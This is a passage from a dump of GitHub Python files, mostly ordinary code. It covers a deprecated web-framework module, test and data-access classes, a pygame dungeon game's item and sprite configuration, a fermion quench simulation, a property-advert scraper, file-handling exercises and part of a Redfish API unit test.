-*-\nu\"\"\"\n\n@author:\t\tMartí Congost\n@contact:\t\tmarti.congost@whads.com\n@organization:\tWhads/Accent SL\n@since:\t\t\tJuly 2008\n\"\"\"\nfrom warnings import warn\nwarn(\n \"woost.controllers.module.Module is deprecated, and its subclasses \"\n \"(LanguageModule and AuthenticationModule) have been relocated to \"\n \"woost.app\",\n DeprecationWarning\n)\n\n\nclass Module(object):\n\n def __init__(self, application):\n self.application = application\n\n","repo_name":"marticongost/woost","sub_path":"woost/controllers/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"39485957376","text":"from core.repositories import BookingRepository\nfrom core.models import Booking, Movie\n\n\nclass TestBookingRepository(BookingRepository):\n def __init__(self):\n self.bookings: dict = []\n self._init()\n\n def faker(self):\n aMovie = Movie(\"Avengers 5\", \"\")\n result = {}\n a = Booking()\n a.id = 1\n a.movie = aMovie\n a.seats = [\"A1\", \"A2\"]\n a.time = \"2PM\"\n a.owner = \"Steve\"\n a.date = \"2022-04-01\"\n result[a.id] = a\n\n bMovie = Movie(\"Avengers 4\", \"\")\n a = Booking()\n a.id = 2\n a.movie = bMovie\n a.seats = [\"A1\", \"A2\"]\n a.time = \"2PM\"\n a.owner = \"Rogers\"\n a.date = \"2022-02-02\"\n result[a.id] = a\n\n return result\n\n def _init(self):\n self.bookings = self.faker()\n\n def _save(self):\n pass\n \nTestBookingRepository.__test__ = False","repo_name":"IsaTippens/Groupware","sub_path":"core/repositories/test_booking_repository.py","file_name":"test_booking_repository.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"28343845496","text":"from sqlalchemy.ext.asyncio import AsyncSession\nfrom db.models import User\n\n###########################################################\n# BLOCK FOR INTERACTION WITH DATABASE IN BUSINESS CONTEXT #\n###########################################################\n\n\nclass UserDAL:\n \"\"\"Data Access Layer for operating user info\"\"\"\n\n def __init__(self, db_session: AsyncSession):\n self.db_session = db_session\n\n async def create_user(\n self, name: str, surname: str, email: str\n ) -> User:\n new_user = User(\n name=name,\n surname=surname,\n email=email,\n )\n self.db_session.add(new_user)\n await self.db_session.flush()\n return new_user\n","repo_name":"virt-from-siberia/Python","sub_path":"[youtube] FASTAPI FULL TUTORIAL НА РЕАЛЬНОМ ПРОЕКТЕ/db/dals.py","file_name":"dals.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"12050666144","text":"\"\"\"Define settings for the sprites\"\"\"\nimport os\nfrom os import path\nimport pygame as pg\nfrom config.window import HEIGHT, TILESIZE, WIDTH\nfrom tools import strip_from_sheet as strip\nfrom itertools import cycle\nfrom logger import logger\n\ngame_folder = path.dirname('.')\nassets_folder = path.join(game_folder, 'assets')\nitems_folder = path.join(assets_folder, \"img\", 'items')\nsprites_folder = path.join(assets_folder, 'sprites')\n\n# player\nPLAYER_SPEED = 280\nPLAYER_ROT_SPEED = 200\nPLAYER_MAX_HP = 100\nPLAYER_MAX_MP = 50\nPLAYER_HIT_RECT = pg.Rect(0, 0, 35, 35)\n\n# enemy\nWAIT_TIME = 800\n\nMALUS_ARC = 0.001\n\n# trap\nTRAP_DAMAGE = 10\n\n# all items\nITEMS = {\n f.split('.png')[0]: pg.image.load(path.join(items_folder, f))\n for f in os.listdir(items_folder) if f.endswith('.png')}\n\n# equipables\nCONSUMABLE = {\n \"red_potion_small\": {\n \"image_name\": \"potion_02a\",\n \"price\": 10,\n \"weight\": 2,\n \"heal\": 30,\n \"shield\": 0,\n \"object_type\": \"consumable\"\n },\n \"blue_potion_small\": {\n \"image_name\": \"potion_02b\",\n \"price\": 10,\n \"weight\": 2,\n \"heal\": 0,\n \"shield\": 15,\n \"object_type\": \"consumable\"\n },\n \"cookie_small\": {\n \"image_name\": \"cookie_01a\",\n \"price\": 10,\n \"weight\": 2,\n \"heal\": 10,\n \"shield\": 0,\n \"object_type\": \"consumable\"\n },\n}\nSCOPE_HAND = 3 * TILESIZE\nSCOPE_SWORD = 5 * TILESIZE\nSCOPE_ARC = 13 * TILESIZE\n# il faut ajouter l'item type\nWEAPONS = {\n \"bronze_sword_small\": {\n \"image_name\": \"sword_01a\",\n \"price\": 10,\n \"weight\": 10,\n \"slot\": \"weapon\",\n \"type\": \"sword\",\n \"number_dice\": 1,\n \"dice_value\": 2,\n \"scope\": SCOPE_SWORD,\n \"object_type\": \"weapon\"\n },\n \"steal_sword_small\": {\n \"image_name\": \"sword_01b\",\n \"price\": 10,\n \"weight\": 10,\n \"slot\": \"weapon\",\n \"type\": \"sword\",\n \"number_dice\": 1,\n \"dice_value\": 3,\n \"scope\": SCOPE_SWORD,\n \"object_type\": \"weapon\"\n },\n \"sapphire_sword_small\": {\n \"image_name\": \"sword_01c\",\n \"price\": 10,\n \"weight\": 10,\n \"slot\": \"weapon\",\n \"type\": \"sword\",\n \"number_dice\": 1,\n \"dice_value\": 4,\n \"scope\": SCOPE_SWORD,\n \"object_type\": \"weapon\"\n },\n \"gold_sword_small\": {\n \"image_name\": \"sword_01d\",\n \"price\": 10,\n \"weight\": 10,\n \"slot\": \"weapon\",\n \"type\": \"sword\",\n \"number_dice\": 1,\n \"dice_value\": 5,\n \"scope\": SCOPE_SWORD,\n \"object_type\": \"weapon\"\n\n },\n \"ruby_sword_small\": {\n \"image_name\": \"sword_01e\",\n \"price\": 10,\n \"weight\": 10,\n \"slot\": \"weapon\",\n \"type\": \"sword\",\n \"number_dice\": 1,\n \"dice_value\": 6,\n \"scope\": SCOPE_SWORD,\n \"object_type\": \"weapon\"\n },\n \"bronze_sword_medium\": {\n \"image_name\": \"sword_02a\",\n \"price\": 10,\n \"weight\": 10,\n \"slot\": \"weapon\",\n \"type\": \"sword\",\n \"number_dice\": 2,\n \"dice_value\": 3,\n \"scope\": SCOPE_SWORD,\n \"object_type\": \"weapon\"\n },\n \"steal_sword_medium\": {\n \"image_name\": \"sword_02b\",\n \"price\": 10,\n \"weight\": 10,\n \"slot\": \"weapon\",\n \"type\": \"sword\",\n \"number_dice\": 2,\n \"dice_value\": 4,\n \"scope\": SCOPE_SWORD,\n \"object_type\": \"weapon\"\n },\n \"sapphire_sword_medium\": {\n \"image_name\": \"sword_02c\",\n \"price\": 10,\n \"weight\": 10,\n \"slot\": \"weapon\",\n \"type\": \"sword\",\n \"number_dice\": 2,\n \"dice_value\": 5,\n \"scope\": SCOPE_SWORD,\n \"object_type\": \"weapon\"\n },\n \"gold_sword_medium\": {\n \"image_name\": \"sword_02d\",\n \"price\": 10,\n \"weight\": 10,\n \"slot\": \"weapon\",\n \"type\": \"sword\",\n \"number_dice\": 2,\n \"dice_value\": 6,\n \"scope\": SCOPE_SWORD,\n \"object_type\": \"weapon\"\n },\n \"ruby_sword_medium\": {\n \"image_name\": \"sword_02e\",\n \"price\": 10,\n \"weight\": 10,\n \"slot\": \"weapon\",\n \"type\": \"sword\",\n \"number_dice\": 2,\n \"dice_value\": 7,\n \"scope\": SCOPE_SWORD,\n \"object_type\": \"weapon\"\n },\n \"bronze_arc_small\": {\n \"image_name\": \"bow_01a\",\n \"weight\": 15,\n \"slot\": \"weapon\",\n \"type\": \"arc\",\n \"number_dice\": 2,\n \"dice_value\": 10,\n \"scope\": SCOPE_ARC,\n \"price\": 10,\n \"object_type\": \"weapon\"\n },\n \"steal_arc_small\": {\n \"image_name\": \"bow_01b\",\n \"weight\": 15,\n \"slot\": \"weapon\",\n \"type\": \"arc\",\n \"number_dice\": 2,\n \"dice_value\": 11,\n \"scope\": SCOPE_ARC,\n \"price\": 10,\n \"object_type\": \"weapon\"\n },\n \"sapphire_arc_small\": {\n \"image_name\": \"bow_01c\",\n \"weight\": 15,\n \"slot\": \"weapon\",\n \"type\": \"arc\",\n \"number_dice\": 2,\n \"dice_value\": 12,\n \"scope\": SCOPE_ARC,\n \"price\": 10,\n \"object_type\": \"weapon\"\n },\n \"gold_arc_small\": {\n \"image_name\": \"bow_01d\",\n \"weight\": 15,\n \"slot\": \"weapon\",\n \"type\": \"arc\",\n \"number_dice\": 2,\n \"dice_value\": 13,\n \"scope\": SCOPE_ARC,\n \"price\": 10,\n \"object_type\": \"weapon\"\n },\n \"ruby_arc_small\": {\n \"image_name\": \"bow_01e\",\n \"weight\": 15,\n \"slot\": \"weapon\",\n \"type\": \"arc\",\n \"number_dice\": 2,\n \"dice_value\": 14,\n \"scope\": SCOPE_ARC,\n \"price\": 10,\n \"object_type\": \"weapon\"\n },\n \"bronze_arc_medium\": {\n \"image_name\": \"bow_02a\",\n \"weight\": 15,\n \"slot\": \"weapon\",\n \"type\": \"arc\",\n \"number_dice\": 2,\n \"dice_value\": 15,\n \"scope\": SCOPE_ARC,\n \"price\": 10,\n \"object_type\": \"weapon\"\n },\n \"steal_arc_medium\": {\n \"image_name\": \"bow_02b\",\n \"weight\": 15,\n \"slot\": \"weapon\",\n \"type\": \"arc\",\n \"number_dice\": 2,\n \"dice_value\": 16,\n \"scope\": SCOPE_ARC,\n \"price\": 10,\n \"object_type\": \"weapon\"\n },\n \"sapphire_arc_medium\": {\n \"image_name\": \"bow_02c\",\n \"weight\": 15,\n \"slot\": \"weapon\",\n \"type\": \"arc\",\n \"number_dice\": 2,\n \"dice_value\": 17,\n \"scope\": SCOPE_ARC,\n \"price\": 10,\n \"object_type\": \"weapon\"\n },\n \"gold_arc_medium\": {\n \"image_name\": \"bow_02d\",\n \"weight\": 15,\n \"slot\": \"weapon\",\n \"type\": \"arc\",\n \"number_dice\": 2,\n \"dice_value\": 18,\n \"scope\": SCOPE_ARC,\n \"price\": 10,\n \"object_type\": \"weapon\"\n },\n \"ruby_arc_medium\": {\n \"image_name\": \"bow_02e\",\n \"weight\": 15,\n \"slot\": \"weapon\",\n \"type\": \"arc\",\n \"number_dice\": 2,\n \"dice_value\": 19,\n \"scope\": SCOPE_ARC,\n \"price\": 10,\n \"object_type\": \"weapon\"\n },\n \"bronze_arc_large\": {\n \"image_name\": \"bow_03a\",\n \"weight\": 15,\n \"slot\": \"weapon\",\n \"type\": \"arc\",\n \"number_dice\": 3,\n \"dice_value\": 15,\n \"scope\": SCOPE_ARC,\n \"price\": 10,\n \"object_type\": \"weapon\"\n },\n \"steal_arc_large\": {\n \"image_name\": \"bow_03b\",\n \"weight\": 15,\n \"slot\": \"weapon\",\n \"type\": \"arc\",\n \"number_dice\": 3,\n \"dice_value\": 16,\n \"scope\": SCOPE_ARC,\n \"price\": 10,\n \"object_type\": \"weapon\"\n },\n \"sapphire_arc_large\": {\n \"image_name\": \"bow_03c\",\n \"weight\": 15,\n \"slot\": \"weapon\",\n \"type\": \"arc\",\n \"number_dice\": 3,\n \"dice_value\": 17,\n \"scope\": SCOPE_ARC,\n \"price\": 10,\n \"object_type\": \"weapon\"\n },\n \"gold_arc_large\": {\n \"image_name\": \"bow_03d\",\n \"weight\": 15,\n \"slot\": \"weapon\",\n \"type\": \"arc\",\n \"number_dice\": 3,\n \"dice_value\": 18,\n \"scope\": SCOPE_ARC,\n \"price\": 10,\n \"object_type\": \"weapon\"\n },\n \"ruby_arc_large\": {\n \"image_name\": \"bow_03e\",\n \"weight\": 15,\n \"slot\": \"weapon\",\n \"type\": \"arc\",\n \"number_dice\": 3,\n \"dice_value\": 19,\n \"scope\": SCOPE_ARC,\n \"price\": 10,\n \"object_type\": \"weapon\"\n },\n \"bronze_dagger_small\": {\n \"image_name\": \"sword_03a\",\n \"weight\": 10,\n \"slot\": \"weapon\",\n \"type\": \"dagger\",\n \"number_dice\": 1,\n \"dice_value\": 3,\n \"scope\": SCOPE_SWORD,\n \"price\": 10,\n \"object_type\": \"weapon\",\n },\n \"steal_dagger_small\": {\n \"image_name\": \"sword_03b\",\n \"weight\": 10,\n \"slot\": \"weapon\",\n \"type\": \"dagger\",\n \"number_dice\": 1,\n \"dice_value\": 4,\n \"scope\": SCOPE_SWORD,\n \"price\": 10,\n \"object_type\": \"weapon\"\n },\n \"sapphire_dagger_small\": {\n \"image_name\": \"sword_03c\",\n \"weight\": 10,\n \"slot\": \"weapon\",\n \"type\": \"dagger\",\n \"number_dice\": 1,\n \"dice_value\": 5,\n \"scope\": SCOPE_SWORD,\n \"price\": 10,\n \"object_type\": \"weapon\"\n },\n \"gold_dagger_small\": {\n \"image_name\": \"sword_03d\",\n \"weight\": 10,\n \"slot\": \"weapon\",\n \"type\": \"dagger\",\n \"number_dice\": 1,\n \"dice_value\": 6,\n \"scope\": SCOPE_SWORD,\n \"price\": 10,\n \"object_type\": \"weapon\"\n },\n \"ruby_dagger_small\": {\n \"image_name\": \"sword_03e\",\n \"weight\": 10,\n \"slot\": \"weapon\",\n \"type\": \"dagger\",\n \"number_dice\": 1,\n \"dice_value\": 7,\n \"scope\": SCOPE_SWORD,\n \"price\": 10,\n \"object_type\": \"weapon\"\n },\n}\n\nARMOR = { # on va utiliser ses champs là et faire des .keys pour la création depuis la map et là on va mettre des randints et pour l'attribution au marchant, on va en prendre entre 1 et 5 aléatoires\n \"bronze_helmet_small\": {\n \"image_name\": \"helmet_01a\",\n \"price\": 10,\n \"weight\": 10,\n \"shield\": 5,\n \"slot\": 'head',\n \"object_type\": \"armor\"\n },\n \"steal_helmet_small\": {\n \"image_name\": \"helmet_01b\",\n \"price\": 10,\n \"weight\": 10,\n \"shield\": 10,\n \"slot\": 'head',\n \"object_type\": \"armor\"\n },\n \"sapphire_helmet_small\": {\n \"image_name\": \"helmet_01c\",\n \"price\": 10,\n \"weight\": 10,\n \"shield\": 15,\n \"slot\": 'head',\n \"object_type\": \"armor\"\n },\n \"gold_helmet_small\": {\n \"image_name\": \"helmet_01d\",\n \"price\": 10,\n \"weight\": 15,\n \"shield\": 15,\n \"slot\": \"head\",\n \"object_type\": \"armor\"\n },\n \"ruby_helmet_small\": {\n \"image_name\": \"helmet_01e\",\n \"price\": 10,\n \"weight\": 15,\n \"shield\": 20,\n \"slot\": \"head\",\n \"object_type\": \"armor\"\n },\n \"bronze_helmet_medium\": {\n \"image_name\": \"helmet_02a\",\n \"price\": 10,\n \"weight\": 10,\n \"shield\": 10,\n \"slot\": 'head',\n \"object_type\": \"armor\"\n },\n \"steal_helmet_medium\": {\n \"image_name\": \"helmet_02b\",\n \"price\": 10,\n \"weight\": 10,\n \"shield\": 15,\n \"slot\": 'head',\n \"object_type\": \"armor\"\n },\n \"sapphire_helmet_medium\": {\n \"image_name\": \"helmet_02c\",\n \"price\": 10,\n \"weight\": 10,\n \"shield\": 20,\n \"slot\": 'head',\n \"object_type\": \"armor\"\n },\n \"gold_helmet_medium\": {\n \"image_name\": \"helmet_02d\",\n \"price\": 10,\n \"weight\": 15,\n \"shield\": 20,\n \"slot\": \"head\",\n \"object_type\": \"armor\"\n },\n \"ruby_helmet_medium\": {\n \"image_name\": \"helmet_02e\",\n \"price\": 10,\n \"weight\": 15,\n \"shield\": 25,\n \"slot\": \"head\",\n \"object_type\": \"armor\"\n },\n \"bronze_chest_small\": {\n \"image_name\": \"armor_01a\",\n \"price\": 10,\n \"weight\": 20,\n \"shield\": 15,\n \"slot\": \"chest\",\n \"object_type\": \"armor\"\n },\n \"steal_chest_small\": {\n \"image_name\": \"armor_01b\",\n \"price\": 10,\n \"weight\": 20,\n \"shield\": 20,\n \"slot\": \"chest\",\n \"object_type\": \"armor\"\n },\n \"sapphire_chest_small\": {\n \"image_name\": \"armor_01c\",\n \"price\": 10,\n \"weight\": 20,\n \"shield\": 25,\n \"slot\": \"chest\",\n \"object_type\": \"armor\"\n },\n \"gold_chest_small\": {\n \"image_name\": \"armor_01d\",\n \"price\": 10,\n \"weight\": 20,\n \"shield\": 25,\n \"slot\": \"chest\",\n \"object_type\": \"armor\"\n },\n \"ruby_chest_small\": {\n \"image_name\": \"armor_01e\",\n \"price\": 10,\n \"weight\": 30,\n \"shield\": 30,\n \"slot\": \"chest\",\n \"object_type\": \"armor\"\n },\n \"bronze_boots_small\": {\n \"image_name\": \"boots_01a\",\n \"price\": 10,\n \"weight\": 20,\n \"shield\": 5,\n \"slot\": \"feet\",\n \"object_type\": \"armor\"\n },\n \"steal_boots_small\": {\n \"image_name\": \"boots_01b\",\n \"price\": 10,\n \"weight\": 20,\n \"shield\": 10,\n \"slot\": \"feet\",\n \"object_type\": \"armor\"\n },\n \"sapphire_boots_small\": {\n \"image_name\": \"boots_01c\",\n \"price\": 10,\n \"weight\": 20,\n \"shield\": 15,\n \"slot\": \"feet\",\n \"object_type\": \"armor\"\n },\n \"gold_boots_small\": {\n \"image_name\": \"boots_01d\",\n \"price\": 10,\n \"weight\": 20,\n \"shield\": 15,\n \"slot\": \"feet\",\n \"object_type\": \"armor\"\n },\n \"ruby_boots_small\": {\n \"image_name\": \"boots_01e\",\n \"price\": 10,\n \"weight\": 30,\n \"shield\": 20,\n \"slot\": \"feet\",\n \"object_type\": \"armor\"\n }\n}\n\nSPELLS = {\n \"fireball\": {\n \"image_name\": \"fireball\",\n \"type\": \"attack\",\n \"scope\": 3 * TILESIZE,\n \"slot\": \"spell\",\n \"object_type\": \"spell\",\n \"time_to_live\": 4,\n \"number_dice\": 2,\n \"dice_value\": 10\n },\n \"heal\": {\n \"image_name\": \"heal\",\n \"type\": \"heal\",\n \"scope\": 5 * TILESIZE,\n \"slot\": \"spell\",\n \"object_type\": \"spell\",\n \"time_to_live\": 6,\n \"number_dice\": 2,\n \"dice_value\": 10\n }\n}\n\nOTHERS = {\n \"bronze_key_small\": {\n \"object_type\": \"other\",\n \"image_name\": \"key_01a\",\n \"weight\": 10,\n \"price\": 10\n }\n}\n\nITEMS_PROPERTIES = ARMOR | WEAPONS | SPELLS | OTHERS | CONSUMABLE\nITEMS_NAMES = list(ARMOR.keys()) + list(WEAPONS.keys()) + list(SPELLS.keys()\n ) + list(OTHERS.keys()) + list(CONSUMABLE.keys())\n\nWEAPONS_COLS = 5\n\nARMOR_COLS = WEAPONS_COLS\n\nCONSUMABLE_COLS = WEAPONS_COLS\n\n# Character\nWIDTH_CHARACTER = 300\nHEIGHT_CHARACTER = 300\nUSABLE_POINTS = 100\n\n# Bounce\nBOB_RANGE = 15\nBOB_SPEED = 0.4\n\n\n# Heros\nTYPES_HEROS = [\"wizard\", \"soldier\", \"thief\"]\nTYPES = TYPES_HEROS + [\"skeleton_F\", \"skeleton_R\", \"skeleton_W\", \"phantom_F\",\n \"phantom_R\", \"phantom_W\", \"goblin_F\", \"goblin_R\", \"goblin_W\", \"boss\", \"mini_boss\"]\nDIRECTIONS = [\"up\", \"down\", \"left\", \"right\", \"idle\"]\n\nASSETS_SPRITES = {\n _type: {\n key: cycle([pg.transform.scale(pg.image.load(path.join(\n sprites_folder, _type, key, f\"{i}.png\")), (TILESIZE, TILESIZE)) for i in range(3)]) for key in DIRECTIONS\n } for _type in TYPES if _type != 'boss'\n}\n\nASSET_BOSS = {\n 'boss': {\n key: cycle([pg.transform.scale(pg.image.load(path.join(\n sprites_folder, 'boss', key, f\"{i}.png\")), (96, 96)) for i in range(3)]) for key in DIRECTIONS\n }\n}\n\nASSETS_SPRITES = ASSETS_SPRITES | ASSET_BOSS\n\nASSETS_FIRE_BALL = [pg.image.load(path.join(sprites_folder, \"effects_zone\", \"fire_ball\",\n \"{:04d}.png\".format(i))) for i in range(1, 11)]\n\nASSETS_HEAL = [pg.image.load(path.join(sprites_folder, \"effects_zone\", \"heal\",\n \"{:04d}.png\".format(i))) for i in range(1, 60)]\n\nASSETS_MERCHANT = [pg.image.load(path.join(sprites_folder, \"merchant\", f\"{i}.png\"))\n for i in range(4)]\n\nASSETS_DOOR = [pg.transform.scale(\n pg.image.load(path.join(sprites_folder, \"door\", \"opening\", f\"{i}.png\")),\n (TILESIZE, TILESIZE)) for i in range(14)]\n\nASSETS_CHEST = [pg.transform.scale(\n pg.image.load(path.join(sprites_folder, \"chest\", f\"{i}.png\")),\n (TILESIZE, TILESIZE)) for i in range(8)]\n\nASSETS_TRAP = [pg.transform.scale(\n pg.image.load(path.join(sprites_folder, \"trap\", f\"{i}.png\")),\n (TILESIZE, TILESIZE)) for i in range(10)]\n\nASSETS_FLAMES = [pg.image.load(path.join(sprites_folder, \"flames\", f\"{i}.png\"))\n for i in range(6)]\n\nASSETS_CAMP_FIRE = [pg.image.load(path.join(sprites_folder, \"camp_fire\", \"{:04d}.png\".format(i)))\n for i in range(1, 9)]\n\nASSETS_CHANDELIER = [pg.image.load(path.join(sprites_folder, \"chandelier\", \"{:04d}.png\".format(i)))\n for i in range(1, 6)]\n\nASSETS_BOOK_OPENING = [pg.image.load(path.join(sprites_folder, \"book\", \"opening\", f\"{i}.png\"))\n for i in range(4)]\nASSETS_BOOK_NEXT = [pg.image.load(path.join(sprites_folder, \"book\", \"next\", f\"{i}.png\"))\n for i in range(5)]\n\nASSETS_CIRCLE = [pg.image.load(path.join(sprites_folder, \"circle\", \"{:04d}.png\".format(i)))\n for i in range(1, 60)]\n\nASSETS_CONFETTI = [pg.image.load(path.join(sprites_folder, \"confetti\", \"{:04d}.png\".format(i)))\n for i in range(1, 170)]\n","repo_name":"Barbapapazes/dungeons-dragons","sub_path":"config/sprites.py","file_name":"sprites.py","file_ext":"py","file_size_in_byte":17513,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"39322798052","text":"from .tools import FermionicHamiltonian\nfrom .tools import correlation_functions\nimport numpy as np\nfrom scipy.sparse.linalg import expm\n\n\nclass sudden_quench:\n def __init__(self,H0: FermionicHamiltonian,H1: FermionicHamiltonian):\n H0.diagonalize()\n H1.diagonalize()\n self.H0, self.H1 = H0, H1\n self.eigs1, self.W1 = H1.eigs_complete, H1.W\n self.corr = correlation_functions(H0)\n self.w0 = self.H0.w.copy()\n self.time_evolve(0.)\n self.L = self.H0.L\n \n def set_H1(self,H1):\n H1.diagonalize()\n self.H1 = H1\n self.eigs1, self.W1 = H1.eigs_complete, H1.W\n \n def time_evolve(self,t: float):\n self.wt = np.einsum('ij,j,jk,kl->il',self.W1,np.exp(-1j*2.*self.eigs1*t),self.W1.T.conj(),self.w0,optimize=True)#self.W1 @ expm(-1j*2.*np.diag(self.eigs1)*t) @ self.W1.T.conj() @ self.w0\n self.corr.set_W(self.wt)\n self.set_correlation_functions()\n \n def energy(self, FH=None):\n self.corr.setUVfromW()\n if FH is None:\n return self.corr.energy(self.H1)\n else:\n self.corr_temp = correlation_functions()\n _, Wnew = np.linalg.eigh(FH.H)\n self.corr_temp.set_W(Wnew@Wnew.T@self.wt)\n self.corr_temp.L = self.L\n self.corr_temp.setUVfromW()\n self.corr_temp.set_correlation_functions()\n return self.corr_temp.energy(FH)\n \n def set_correlation_functions(self):\n self.corr.setUVfromW()\n self.corr.set_correlation_functions()","repo_name":"alessandro-santini/FreeFermions","sub_path":"sudden_quench.py","file_name":"sudden_quench.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"21430741942","text":"# -*- coding: utf-8 -*-\n\nfrom pymongo import MongoClient\nimport aiohttp\nimport asyncio\nfrom scraper import ScraperConfig\nfrom async_iterators import AdvertIterator\nfrom argparser import args\n\n\nasync def main():\n key = '{0.transaction}-{0.property_type}-{0.city}'.format(args)\n\n client = MongoClient('localhost', 27017)\n db = client.advert_db\n collection = db[key]\n\n def get_advert_func(advert_id):\n return collection.find_one({'advert_id': advert_id})\n\n async with aiohttp.ClientSession() as session:\n scraper_config = ScraperConfig(\n session,\n args.transaction,\n args.property_type,\n args.city,\n distance=args.distance\n )\n\n found = 0\n updated = 0\n created = 0\n\n advert_iterator = AdvertIterator(\n scraper_config,\n days_treshold=args.days_limit,\n page_from=args.page_from,\n page_to=args.page_to,\n get_advert_func=get_advert_func,\n skip_if_advert_exists=args.all\n )\n async for advert, advert_number in advert_iterator:\n\n result = collection.update_one(\n {'advert_id': advert.advert_id},\n {'$set': advert.to_dict()},\n True\n )\n if result.matched_count > 0:\n found += 1\n\n if result.upserted_id:\n created += 1\n else:\n updated += 1\n\n print('[{}] {}: {}'.format(key, advert_number, advert.link))\n\n print(f'Found: {found}\\nUpdated: {updated}\\nCreated: {created}')\n\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main())\n","repo_name":"miszczu-blady/crisis-stats","sub_path":"scripts/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"24413618425","text":"from csv import reader\nfrom settings import tile_size\nimport pygame\nimport sys\nimport os\n\n\ndef import_folder(path):\n surface_list = []\n\n for _, __, image_files in os.walk(path):\n for image in image_files:\n full_path = path + '/' + image\n full_path = resource_path(full_path)\n image_surf = pygame.image.load(full_path).convert_alpha()\n surface_list.append(image_surf)\n\n return surface_list\n\n\ndef import_csv_layout(path):\n terrain_map = []\n with open(path) as map:\n level = reader(map, delimiter=',')\n for row in level:\n terrain_map.append(list(row))\n return terrain_map\n\n\ndef import_cut_graphics(path):\n surface = pygame.image.load(path).convert_alpha()\n tile_num_x = int(surface.get_size()[0] / tile_size)\n tile_num_y = int(surface.get_size()[1] / tile_size)\n\n cut_tiles = []\n for row in range(tile_num_y):\n for col in range(tile_num_x):\n x = col * tile_size\n y = row * tile_size\n new_surf = pygame.Surface((tile_size, tile_size), flags=pygame.SRCALPHA)\n new_surf.blit(surface, (0, 0), pygame.Rect(x, y, tile_size, tile_size))\n cut_tiles.append(new_surf)\n\n return cut_tiles\n\n\ndef resource_path(relative_path):\n try:\n # PyInstaller creates a temp folder and stores path in _MEIPASS\n base_path = sys._MEIPASS\n except Exception:\n base_path = os.path.abspath(\".\")\n\n return os.path.join(base_path, relative_path)\n","repo_name":"esquaredj/RaspberryPyGame","sub_path":"support.py","file_name":"support.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"35828170701","text":"# hello_file = open(\"hello.txt\", \"w\")\n# ga_intro = \"Hello GA\"\n# hello_file.write(ga_intro)\n# # print(hello_file.read())\n# hello_file.close()\n\n# car_file = open(\"car.txt\", \"w\")\n# new_car_list = \"Tesla Model S\\nMercedes C300\\nToyota Camry\"\n# car_file.write(new_car_list)\n# # print(car_file.read())\n# car_file.close()\n\n# my_new_file = open('person.txt', 'r+')\n# my_new_file.write(\"nikki\\nruben\\nsimone\")\n# # print(my_new_file.readlines())\n# my_new_file.close()\n\n# with open('person.txt') as peoples:\n# people_list= peoples.readlines()\n\n# for each_person in people_list:\n# print(each_person)\n\n\n\n# person_file = open('person.txt')\n# print(person_file.read())\n# person_file.close()\n\n# with open('person.txt', 'w') as person_file:\n# person_file.write('Ruben')\n\n# #append to a file\n# with open('person.txt', 'a') as person_file:\n# person_file.write('\\nRome')\n\n# with open('person.txt', 'r+') as person_file:\n# # print(person_file.read())\n# # person_file.write('\\nYvonne')\n# print(person_file.read())\n\n# with open('hello.txt', 'w+') as hello_file:\n# print(hello_file.read())\n\nwith open('one_to_hundred.txt') as numbers:\n number_list = numbers.readlines()\n result = []\n for each_number in number_list:\n if 'Five' in each_number:\n result.append(each_number)\n elif 'Fifteen' in each_number:\n result.append(each_number)\n else: continue\n print(result)\n\n# with open('prime_numbers.txt') as numbers:\n# number_list = numbers.readlines()\n\n# for each_number in number_list:\n# new_num = (int(each_number) * 2)\n# print(new_num)","repo_name":"NikkiHmltn/python-scripting","sub_path":"myscript.py","file_name":"myscript.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"26531008841","text":"import json\n\n# 3rd party libs\nfrom flask_api import status\nfrom hpOneView.exceptions import HPOneViewException\nfrom hpOneView.resources.servers.server_hardware import ServerHardware\nfrom unittest import mock\n\n# Module libs\nfrom oneview_redfish_toolkit.api.redfish_json_validator import \\\n RedfishJsonValidator\nfrom oneview_redfish_toolkit.blueprints import \\\n network_device_function_collection\nfrom oneview_redfish_toolkit.tests.base_flask_test import BaseFlaskTest\n\n\nclass TestNetworkDeviceFunctionCollection(BaseFlaskTest):\n \"\"\"Tests for NetworkDeviceFunctionCollection blueprint\"\"\"\n\n @classmethod\n def setUpClass(self):\n super(TestNetworkDeviceFunctionCollection, self).setUpClass()\n\n self.app.register_blueprint(\n network_device_function_collection.\n network_device_function_collection)\n\n # Loading server_hardware mockup value\n with open(\n 'oneview_redfish_toolkit/mockups/oneview/'\n 'ServerHardware.json'\n ) as f:\n self.server_hardware = json.load(f)\n\n def test_get_network_device_function_collection(self):\n \"\"\"Tests NetworkDeviceFunctionCollection\"\"\"\n\n # Loading NetworkDeviceFunctionCollection mockup result\n with open(\n 'oneview_redfish_toolkit/mockups/redfish/'\n 'NetworkDeviceFunctionCollection.json'\n ) as f:\n network_device_function_collection_mockup = json.load(f)\n\n # Create mock response\n serverhw_obj = ServerHardware(\n self.oneview_client, self.server_hardware)\n self.oneview_client.server_hardware.get_by_id.return_value = \\\n serverhw_obj\n\n # Get NetworkDeviceFunctionCollection\n response = self.client.get(\n \"/redfish/v1/Chassis/30303437-3034-4D32-3230-313133364752/\"\n \"NetworkAdapters/3/NetworkDeviceFunctions/\"\n )\n\n # Gets json from response\n result = json.loads(response.data.decode(\"utf-8\"))\n\n # Tests response\n self.assertEqual(status.HTTP_200_OK, response.status_code)\n self.assertEqual(\"application/json\", response.mimetype)\n self.assertEqualMockup(network_device_function_collection_mockup,\n result)\n\n def 